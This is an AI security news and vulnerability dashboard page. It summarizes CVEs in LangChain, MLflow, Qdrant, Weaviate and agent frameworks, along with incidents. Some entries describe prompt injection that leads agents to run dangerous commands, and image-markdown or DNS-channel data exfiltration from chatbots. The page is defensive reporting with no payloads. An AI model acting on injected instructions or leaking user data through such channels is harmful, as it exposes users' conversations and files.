aisecwatch.com
DashboardVulnerabilitiesNewsResearchArchiveStatsDataset
aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.

Navigation

VulnerabilitiesNewsResearchDigest ArchiveNewsletter ArchiveSubscribeData SourcesStatisticsDatasetAPIIntegrationsWidgetRSS Feed

Maintained by

Truong (Jack) Luu

Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. Built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

[TOTAL_TRACKED]
2,677
[LAST_24H]
25
[LAST_7D]
167
Daily BriefingMonday, March 30, 2026
>

Anthropic's Unreleased Cybersecurity Model Accidentally Exposed: A configuration error leaked details of Anthropic's powerful new AI model called Mythos, designed for cybersecurity use cases with advanced reasoning and coding abilities including recursive self-fixing (autonomously finding and patching its own bugs). The leak raises concerns because the model's improved vulnerability detection could enable more sophisticated cyberattacks, prompting Anthropic to plan a phased rollout to enterprise security teams first.

>

Critical Command Injection in MLflow Model Deployment: MLflow has a command injection vulnerability (where attackers insert malicious commands into input that gets executed) in its model serving code when using `env_manager=LOCAL`, allowing attackers to execute arbitrary commands by manipulating dependency information in the `python_env.yaml` file without any safety checks. (CVE-2025-15379, Critical)

Latest Intel

page 212/268
VIEW ALL
01

CVE-2023-38975: * Buffer Overflow vulnerability in qdrant v.1.3.2 allows a remote attacker cause a denial of service via the chucnked_ve

security
Aug 29, 2023

A buffer overflow vulnerability (a memory safety flaw where data is written beyond allocated space) in Qdrant version 1.3.2 allows remote attackers to cause a denial of service (making the service unavailable) through the chunked_vectors component. The vulnerability has a CVSS score of 4.0, indicating moderate severity.

Critical This Week5 issues
critical

CVE-2025-15379: A command injection vulnerability exists in MLflow's model serving container initialization code, specifically in the `_

CVE-2025-15379NVD/CVE DatabaseMar 30, 2026
Mar 30, 2026
>

Multiple High-Severity Flaws in AI Agent Frameworks: CrewAI has several vulnerabilities including Docker fallback issues that enable RCE (remote code execution, where attackers run commands on systems they don't control) when containerization fails (CVE-2026-2287, CVE-2026-2275), while OpenClaw suffers from malicious plugin code execution during installation and sandbox bypass flaws that let agents access other agents' workspaces. SakaDev and HAI Build Code Generator can both be tricked through prompt injection (hiding malicious instructions in normal-looking input) to misclassify dangerous terminal commands as safe and execute them automatically (CVE-2026-30306, CVE-2026-30308).

>

ChatGPT Data Leakage Vulnerability Patched: OpenAI fixed a vulnerability that allowed attackers to secretly extract sensitive user data including conversation messages and uploaded files by exploiting a hidden DNS-based communication channel (covert data transmission using the Domain Name System) in ChatGPT's Linux runtime, bypassing all safety guardrails designed to prevent unauthorized data sharing.

NVD/CVE Database
02

Video: Data Exfiltration Vulnerabilities in LLM apps (Bing Chat, ChatGPT, Claude)

security
Aug 28, 2023

A researcher discovered data exfiltration vulnerabilities (security flaws that allow unauthorized data to leak out of a system) in several popular AI chatbots including Bing Chat, ChatGPT, and Claude, and responsibly disclosed them to the companies. Microsoft, Anthropic, and a plugin vendor fixed their vulnerabilities, but OpenAI decided not to fix an image markdown injection issue (a vulnerability where hidden code in image formatting can trick the AI into revealing data).

Fix: The source mentions that Microsoft (Bing Chat), Anthropic (Claude), and a plugin vendor addressed and fixed their respective vulnerabilities. However, OpenAI's response to the reported vulnerability was "won't fix," meaning no mitigation from OpenAI is described in the source text.

Embrace The Red
03

CVE-2023-36281: An issue in langchain v.0.0.171 allows a remote attacker to execute arbitrary code via a JSON file to load_prompt. This

security
Aug 22, 2023

LangChain version 0.0.171 has a vulnerability (CVE-2023-36281) that allows a remote attacker to execute arbitrary code (run commands they shouldn't be able to run) by sending a specially crafted JSON file to the load_prompt function. The vulnerability relates to improper control of code generation, which means the application doesn't properly validate or sanitize (clean) the input before using it to create executable code.

NVD/CVE Database
04

CVE-2023-38976: An issue in weaviate v.1.20.0 allows a remote attacker to cause a denial of service via the handleUnbatchedGraphQLReques

security
Aug 21, 2023

Weaviate v.1.20.0 contains a vulnerability (CVE-2023-38976) in the handleUnbatchedGraphQLRequest function that allows remote attackers to cause a denial of service (making a service unavailable by overwhelming it with requests). The vulnerability has a CVSS score of 4.0 (a moderate severity rating).

NVD/CVE Database
05

CVE-2023-39659: An issue in langchain langchain-ai v.0.0.232 and before allows a remote attacker to execute arbitrary code via a crafted

security
Aug 15, 2023

CVE-2023-39659 is a vulnerability in langchain (an AI library) version 0.0.232 and earlier that allows a remote attacker to execute arbitrary code (run commands they choose) by sending a specially crafted script to the PythonAstREPLTool._run component. The vulnerability is caused by improper neutralization of special elements in output (a type of injection attack where untrusted input is not properly filtered before being processed).

NVD/CVE Database
06

CVE-2023-38896: An issue in Harrison Chase langchain v.0.0.194 and before allows a remote attacker to execute arbitrary code via the fro

security
Aug 15, 2023

CVE-2023-38896 is a vulnerability in langchain v.0.0.194 and earlier versions that allows a remote attacker to execute arbitrary code (run commands on a system they don't control) through the from_math_prompt and from_colored_object_prompt functions. This is an injection attack (CWE-74), where the software fails to properly filter special characters or commands that could be misused by downstream components.

Fix: A patch is available at https://github.com/hwchase17/langchain/pull/6003. Users should update langchain to a version after v.0.0.194.

NVD/CVE Database
07

CVE-2023-38860: An issue in LangChain v.0.0.231 allows a remote attacker to execute arbitrary code via the prompt parameter.

security
Aug 15, 2023

LangChain version 0.0.231 has a vulnerability (CVE-2023-38860) where a remote attacker can execute arbitrary code by manipulating the prompt parameter, which is a type of code injection (CWE-94, where an attacker tricks the system into running malicious code by hiding it in input data).

NVD/CVE Database
08

CVE-2023-27506: Improper buffer restrictions in the Intel(R) Optimization for Tensorflow software before version 2.12 may allow an authe

security
Aug 11, 2023

CVE-2023-27506 is a vulnerability in Intel Optimization for Tensorflow software before version 2.12 involving improper buffer restrictions (a memory safety flaw where a program doesn't properly check that it stays within allocated memory). An authenticated user with local access to a system could potentially use this flaw to escalate their privileges, gaining higher-level access than they should have.

Fix: Update Intel Optimization for Tensorflow to version 2.12 or later.

NVD/CVE Database
09

CVE-2023-36095: An issue in Harrison Chase langchain v.0.0.194 allows an attacker to execute arbitrary code via the python exec calls in

security
Aug 5, 2023

LangChain (an AI framework for building applications with language models) version 0.0.194 contains a code injection vulnerability (CWE-94, a weakness where attackers can inject malicious code into a program) that allows attackers to execute arbitrary code through the PALChain component, specifically in the from_math_prompt and from_colored_object_prompt functions that use Python's exec command.

NVD/CVE Database
10

Anthropic Claude Data Exfiltration Vulnerability Fixed

securitysafety
Aug 1, 2023

Anthropic patched a data exfiltration vulnerability in Claude caused by image markdown injection, a technique where attackers embed hidden instructions in image links to trick the AI into leaking sensitive information. While Microsoft fixed this vulnerability in Bing Chat and OpenAI chose not to address it in ChatGPT, Anthropic implemented a mitigation to protect Claude users from this attack.

Embrace The Red
Prev1...210211212213214...268Next
critical

CVE-2026-33873: Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assis

CVE-2026-33873NVD/CVE DatabaseMar 27, 2026
Mar 27, 2026
critical

Attackers exploit critical Langflow RCE within hours as CISA sounds alarm

CSO OnlineMar 27, 2026
Mar 27, 2026
critical

CVE-2025-53521: F5 BIG-IP Unspecified Vulnerability

CVE-2025-53521CISA Known Exploited VulnerabilitiesMar 26, 2026
Mar 26, 2026
critical

CISA: New Langflow flaw actively exploited to hijack AI workflows

BleepingComputerMar 26, 2026
Mar 26, 2026